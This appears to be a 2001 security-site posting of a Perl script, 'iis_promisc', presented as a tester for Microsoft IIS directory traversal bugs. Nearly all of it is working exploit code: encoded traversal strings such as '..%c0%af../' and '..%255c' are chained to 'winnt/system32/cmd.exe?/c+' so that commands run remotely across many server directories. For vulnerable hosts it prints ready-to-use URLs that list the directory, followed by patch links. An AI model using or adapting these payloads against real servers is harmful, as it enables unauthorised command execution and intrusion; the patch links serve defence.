Tool Name 21/5/2001 Test Your System for the Infamous IIS Security Holes Details The following tool tests your system against the two new security vulnerabilities, Escaped Characters Decoding Bug and Unicode Directory Transversal Bug. If your server is found to be vulnerable, a solution URL will be provided. Tool: #!/usr/bin/perl # # iis_promisc v2.0 # # This is a perl script to test the infamous # Microsoft IIS holes: # # -*- Escaped Characters Decoding Bug # -*- Unicode Directory Transversal Bug # # * Support Proxy Server # * Over 20 tests will be made ( if found display the patch URL too :) # # Added to v2: # # -*- Executable File Parsing Bug check # -*- Over 40 bugs tested! # # * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/ # The package libwww is found in many linux distributions # # by inode@unsekure.com.br # greetz to #unsekure @ irc.brasnet.org # http://unsekure.com.br # # 05/2001 if ($#ARGV<0) {die "\n-*- iis_promisc -*-\nUse: $0 www.target.com\n\n";} use LWP; $ua = new LWP::UserAgent; ## Uncomment the line below to use a proxy server #$ua->proxy(['http'], 'http://proxy.server.com:PORT/'); $ua->timeout(60); $ua->agent("Mozilla/5.0 (Win95)"); ($target = @ARGV[0]); $vuln_flag = 0; $port = 80; $test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro"; $dir_command = "winnt/system32/cmd.exe?/c+dir"; $iis = "1"; my @dir=( # You can add more exec dirs here #"/somedir/", "/", ## wwwroot "/scripts/", "/msadc/", "/cgi-bin/", "/bin/", "/samples/", "/_vti_cnf/", "/_vti_bin/", "/adsamples/", "/iisadmpwd/", "/Rpc/", "/PBServer/"); my @string=( "..%255c..%255c..%255c..%255c..%255c..%255c", "..%c0%af../..%c0%af../..%c0%af../", "..%e0%80%af../..%e0%80%af../..%e0%80%af../", "boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C"); if ( ($ENV{'OSTYPE'} || $ENV{'TERM'}) =~ /linux/ ) { $found = "lynx -dump"; } else { $found = "-*- VULN -*-"; } foreach $vul_dir (@dir) { foreach $vul_string (@string) { if ($iis) { @output = conn($vul_dir.$vul_string); foreach $output_line (@output) { if ($output_line =~ /MinhaNossaSenhoraDoPerpetuoSocorro/) { $vuln_flag = $vuln_flag + 1; print "\n$found http://".$target.$vul_dir.$vul_string.$dir_command."\n"; } } } else { print $output_line."\n"; exit; } } } if ($vuln_flag !=0 ) { print qq~ -*--*--*--*--*--*--*--*--*--*--*--*--*- -*- Escaped Characters Decoding Bug -*- -*- Microsoft IIS 5.0 PATCH: -*- http://download.microsoft.com/download/win2000platform/Patch/q293826/NT5/EN-US/Q293826_W2K_SP3_x86_en.EXE -*- Microsoft IIS 4.0 PATCH: -*- http://download.microsoft.com/download/winntsp/Patch/q293826/NT4/EN-US/Q295534i.exe -*--*--*--*--*--*--*--*--*--*--*--*--*-*- -*- Unicode Directory Transversal Bug -*- -*- Microsoft IIS 5.0 PATCH: -*- http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp -*- Microsoft IIS 4.0 PATCH: -*- http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp -*--*--*--*--*--*--*--*--*--*--*-*- -*- Executable File Parsing Bug -*- -*- Microsoft IIS 5.0 PATCH: -*- http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE -*- Microsoft IIS 4.0 PATCH: -*- http://www.microsoft.com/ntserver/nts/downloads/critical/q277873 -*- $vuln_flag hole(s) found at $target! -*- ~; } else { print "\n-*- $target: Not vulnerable -*-\n\n"; exit; } sub conn { my ($GET_STR) = @_; my $req = new HTTP::Request('GET','http://'.$target.$GET_STR.$test_command); my $res= $ua->request($req); if ( $res->server =~/IIS/ ){ $iis = 1; return $res->content; } else { $iis = 0; $err = $res->code; if ( $err == 404 ) { return print "\n-*- Not running MS-IIS -*-\n"; } else { return print "\n-*- HTTP error code $err Connection problems -*-\n"; } } }